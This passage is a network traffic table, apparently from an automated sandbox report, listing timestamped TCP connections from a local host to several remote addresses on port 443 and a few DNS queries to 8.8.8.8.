                                                                                                                                                                                                              May 12, 2021 15:21:44.019493103 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:21:44.034497976 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:44.062906027 CEST4434936334.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:44.062988043 CEST49363443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:21:44.081688881 CEST4434936434.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:44.081784010 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:21:44.132625103 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:21:44.171452999 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:44.171539068 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:44.176532030 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:44.176723957 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:44.194761992 CEST4434936434.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:44.194916964 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:21:44.314429998 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:44.316653013 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:44.316814899 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:44.648102045 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:44.650382042 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:21:44.712833881 CEST4434936434.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:44.712929010 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:21:44.829799891 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:44.936089039 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.022948980 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.072905064 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.073919058 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.073995113 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.091762066 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:21:45.146709919 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.147097111 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.155700922 CEST4434936434.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.155803919 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:21:45.159665108 CEST4434936652.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.159771919 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.160506964 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.284204960 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.284225941 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.284334898 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.284389973 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.296993971 CEST4434936652.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.297060966 CEST4434936652.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.297144890 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.297769070 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.304567099 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.304769039 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.422895908 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.423074961 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.423367977 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.423392057 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.423480988 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.441236973 CEST4434936652.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.442078114 CEST4434936652.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.442276001 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.559851885 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.559892893 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.560024977 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.560158968 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.560178995 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.560194969 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.560233116 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:45.560270071 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.697050095 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.697082043 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.697097063 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.697695971 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.697741032 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.698828936 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:45.698930025 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:46.669686079 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:46.674367905 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:46.807276964 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:46.809479952 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:46.853668928 CEST4434936652.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.114012957 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:47.252149105 CEST4434936652.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.252228022 CEST49366443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:21:48.007261038 CEST49369443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.008182049 CEST49370443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.050806046 CEST44349369151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.050992966 CEST49369443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.051542997 CEST44349370151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.052073002 CEST49370443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.052110910 CEST49370443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.052267075 CEST49369443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.095494986 CEST44349370151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.095529079 CEST44349369151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.095542908 CEST44349370151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.095555067 CEST44349370151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.095616102 CEST49370443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.095644951 CEST44349369151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.095693111 CEST44349369151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.095700026 CEST49369443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.095732927 CEST49369443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.096076965 CEST49370443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.097228050 CEST49371443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.097568035 CEST49369443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.098575115 CEST49372443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.139414072 CEST44349370151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.140582085 CEST44349371151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.140710115 CEST49371443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.140805006 CEST44349369151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.141470909 CEST49371443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.141920090 CEST44349372151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.142019987 CEST49372443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.142534971 CEST49372443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.185053110 CEST44349371151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.185085058 CEST44349371151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.185091972 CEST44349371151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.185821056 CEST44349372151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.185870886 CEST44349372151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.185911894 CEST44349372151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.185983896 CEST49371443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.186362028 CEST49371443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.186363935 CEST49372443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.186400890 CEST49372443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.187592030 CEST49373443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.187853098 CEST49374443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.229675055 CEST44349371151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.229701996 CEST44349372151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.230935097 CEST44349373151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.231009007 CEST49373443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.231096029 CEST44349374151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.231149912 CEST49374443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.231481075 CEST49373443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.231648922 CEST49374443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.275005102 CEST44349373151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.275125980 CEST49373443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:48.275228977 CEST44349374151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:48.275279999 CEST49374443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.083211899 CEST49375443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.083268881 CEST49376443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.133224964 CEST44349376151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.133248091 CEST44349375151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.133326054 CEST49376443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.134238958 CEST49375443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.134259939 CEST49376443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.134288073 CEST49375443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.178217888 CEST44349376151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.178239107 CEST44349375151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.178246975 CEST44349376151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.178258896 CEST44349376151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.178361893 CEST49376443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.178411961 CEST49376443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.178966999 CEST49376443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.182606936 CEST49377443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.192461967 CEST44349375151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.192478895 CEST44349375151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.192574024 CEST49375443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.192611933 CEST49375443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.193033934 CEST49375443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.194235086 CEST49378443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.222345114 CEST44349376151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.226001978 CEST44349377151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.226104975 CEST49377443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.227037907 CEST49377443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.236334085 CEST44349375151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.237524986 CEST44349378151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.237627029 CEST49378443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.238769054 CEST49378443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.270313025 CEST44349377151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.270385981 CEST44349377151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.270423889 CEST44349377151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.270437956 CEST49377443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.270464897 CEST49377443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.274332047 CEST49377443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.275453091 CEST49380443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.283695936 CEST44349378151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.283829927 CEST44349378151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.283864975 CEST44349378151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.283888102 CEST49378443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.283916950 CEST49378443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.284609079 CEST49378443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.285729885 CEST49381443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.319446087 CEST44349377151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.320533991 CEST44349380151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.320620060 CEST49380443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.321247101 CEST49380443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.327862978 CEST44349378151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.329113007 CEST44349381151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.329205990 CEST49381443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.337414026 CEST49381443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.364665031 CEST44349380151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.364789009 CEST49380443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:49.380847931 CEST44349381151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:49.380994081 CEST49381443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:22:06.154716015 CEST44349273192.229.221.185192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:06.154741049 CEST44349273192.229.221.185192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:06.154973984 CEST49273443192.168.2.22192.229.221.185
                                                                                                                                                                                                              May 12, 2021 15:22:06.410028934 CEST44349272192.229.221.185192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:06.410187960 CEST49272443192.168.2.22192.229.221.185
                                                                                                                                                                                                              May 12, 2021 15:22:07.457350969 CEST44349288152.199.21.175192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:07.457376003 CEST44349288152.199.21.175192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:07.457545042 CEST49288443192.168.2.22152.199.21.175
                                                                                                                                                                                                              May 12, 2021 15:22:09.063235998 CEST44349287152.199.21.175192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:09.063452959 CEST49287443192.168.2.22152.199.21.175
                                                                                                                                                                                                              May 12, 2021 15:22:38.320739985 CEST4434934434.252.156.174192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:38.320768118 CEST4434934434.252.156.174192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:38.320884943 CEST49344443192.168.2.2234.252.156.174
                                                                                                                                                                                                              May 12, 2021 15:22:38.320919991 CEST49344443192.168.2.2234.252.156.174
                                                                                                                                                                                                              May 12, 2021 15:22:40.714706898 CEST4434935152.210.171.182192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:40.714781046 CEST49351443192.168.2.2252.210.171.182
                                                                                                                                                                                                              May 12, 2021 15:22:44.062674999 CEST4434936334.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:44.062705040 CEST4434936334.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:44.062756062 CEST49363443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:44.062799931 CEST49363443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:45.155986071 CEST4434936434.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:45.156014919 CEST4434936434.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:45.156045914 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:45.156074047 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:45.742885113 CEST4434935152.210.171.182192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:45.743073940 CEST49351443192.168.2.2252.210.171.182
                                                                                                                                                                                                              May 12, 2021 15:22:46.807117939 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:46.807149887 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:46.807225943 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:22:48.691468954 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:22:48.691519976 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:22:48.692084074 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:48.692136049 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:48.692699909 CEST49363443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:48.692743063 CEST49363443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:48.693284035 CEST49361443192.168.2.22172.217.168.66
                                                                                                                                                                                                              May 12, 2021 15:22:48.693671942 CEST49362443192.168.2.22172.217.168.66
                                                                                                                                                                                                              May 12, 2021 15:22:48.694813967 CEST49357443192.168.2.22185.60.216.19
                                                                                                                                                                                                              May 12, 2021 15:22:48.695147038 CEST49358443192.168.2.22185.60.216.19
                                                                                                                                                                                                              May 12, 2021 15:22:48.696167946 CEST49356443192.168.2.22142.250.185.102
                                                                                                                                                                                                              May 12, 2021 15:22:48.696532965 CEST49355443192.168.2.22142.250.185.102
                                                                                                                                                                                                              May 12, 2021 15:22:48.696887970 CEST49351443192.168.2.2252.210.171.182
                                                                                                                                                                                                              May 12, 2021 15:22:48.696947098 CEST49351443192.168.2.2252.210.171.182
                                                                                                                                                                                                              May 12, 2021 15:22:48.698792934 CEST49346443192.168.2.22185.60.216.6
                                                                                                                                                                                                              May 12, 2021 15:22:48.699153900 CEST49345443192.168.2.22185.60.216.6
                                                                                                                                                                                                              May 12, 2021 15:22:48.699507952 CEST49344443192.168.2.2234.252.156.174
                                                                                                                                                                                                              May 12, 2021 15:22:48.699544907 CEST49344443192.168.2.2234.252.156.174
                                                                                                                                                                                                              May 12, 2021 15:22:48.713285923 CEST49311443192.168.2.2252.239.152.74
                                                                                                                                                                                                              May 12, 2021 15:22:48.713547945 CEST49312443192.168.2.2252.239.152.74
                                                                                                                                                                                                              May 12, 2021 15:22:48.719552994 CEST49287443192.168.2.22152.199.21.175
                                                                                                                                                                                                              May 12, 2021 15:22:48.719794989 CEST49288443192.168.2.22152.199.21.175
                                                                                                                                                                                                              May 12, 2021 15:22:48.719816923 CEST49288443192.168.2.22152.199.21.175
                                                                                                                                                                                                              May 12, 2021 15:22:48.731827974 CEST49272443192.168.2.22192.229.221.185
                                                                                                                                                                                                              May 12, 2021 15:22:48.732142925 CEST49273443192.168.2.22192.229.221.185
                                                                                                                                                                                                              May 12, 2021 15:22:48.732166052 CEST49273443192.168.2.22192.229.221.185
                                                                                                                                                                                                              May 12, 2021 15:22:48.735557079 CEST44349357185.60.216.19192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.735584021 CEST44349357185.60.216.19192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.735655069 CEST49357443192.168.2.22185.60.216.19
                                                                                                                                                                                                              May 12, 2021 15:22:48.735917091 CEST49357443192.168.2.22185.60.216.19
                                                                                                                                                                                                              May 12, 2021 15:22:48.736171007 CEST44349358185.60.216.19192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.736195087 CEST44349358185.60.216.19192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.736267090 CEST49358443192.168.2.22185.60.216.19
                                                                                                                                                                                                              May 12, 2021 15:22:48.736404896 CEST49358443192.168.2.22185.60.216.19
                                                                                                                                                                                                              May 12, 2021 15:22:48.739639044 CEST44349346185.60.216.6192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.739660025 CEST44349346185.60.216.6192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.739712000 CEST49346443192.168.2.22185.60.216.6
                                                                                                                                                                                                              May 12, 2021 15:22:48.739753008 CEST49346443192.168.2.22185.60.216.6
                                                                                                                                                                                                              May 12, 2021 15:22:48.739918947 CEST44349345185.60.216.6192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.739945889 CEST44349345185.60.216.6192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.739985943 CEST49345443192.168.2.22185.60.216.6
                                                                                                                                                                                                              May 12, 2021 15:22:48.740029097 CEST49345443192.168.2.22185.60.216.6
                                                                                                                                                                                                              May 12, 2021 15:22:48.744719982 CEST44349356142.250.185.102192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.744752884 CEST49356443192.168.2.22142.250.185.102
                                                                                                                                                                                                              May 12, 2021 15:22:48.746320963 CEST44349361172.217.168.66192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.746361971 CEST49361443192.168.2.22172.217.168.66
                                                                                                                                                                                                              May 12, 2021 15:22:48.747066975 CEST44349355142.250.185.102192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.747127056 CEST49355443192.168.2.22142.250.185.102
                                                                                                                                                                                                              May 12, 2021 15:22:48.747241020 CEST44349362172.217.168.66192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.747303963 CEST49362443192.168.2.22172.217.168.66
                                                                                                                                                                                                              May 12, 2021 15:22:48.754447937 CEST4434936434.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.754587889 CEST49364443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:48.757416010 CEST4434936334.251.174.164192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.757498026 CEST49363443192.168.2.2234.251.174.164
                                                                                                                                                                                                              May 12, 2021 15:22:48.761009932 CEST44349287152.199.21.175192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.761030912 CEST44349288152.199.21.175192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.761109114 CEST4434935152.210.171.182192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.761116028 CEST49287443192.168.2.22152.199.21.175
                                                                                                                                                                                                              May 12, 2021 15:22:48.761193037 CEST49351443192.168.2.2252.210.171.182
                                                                                                                                                                                                              May 12, 2021 15:22:48.761789083 CEST4434934434.252.156.174192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.761842012 CEST49344443192.168.2.2234.252.156.174
                                                                                                                                                                                                              May 12, 2021 15:22:48.772437096 CEST44349272192.229.221.185192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.772491932 CEST49272443192.168.2.22192.229.221.185
                                                                                                                                                                                                              May 12, 2021 15:22:48.772676945 CEST44349273192.229.221.185192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.828202009 CEST4434936552.45.173.110192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.828382015 CEST49365443192.168.2.2252.45.173.110
                                                                                                                                                                                                              May 12, 2021 15:22:48.836360931 CEST4434931152.239.152.74192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:22:48.836513042 CEST49311443192.168.2.2252.239.152.74
                                                                                                                                                                                                              May 12, 2021 15:22:48.837894917 CEST4434931252.239.152.74192.168.2.22

                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              May 12, 2021 15:15:50.952985048 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:15:51.062102079 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:15:51.062443018 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:15:51.173315048 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:15:51.393800020 CEST5309953192.168.2.228.8.8.8
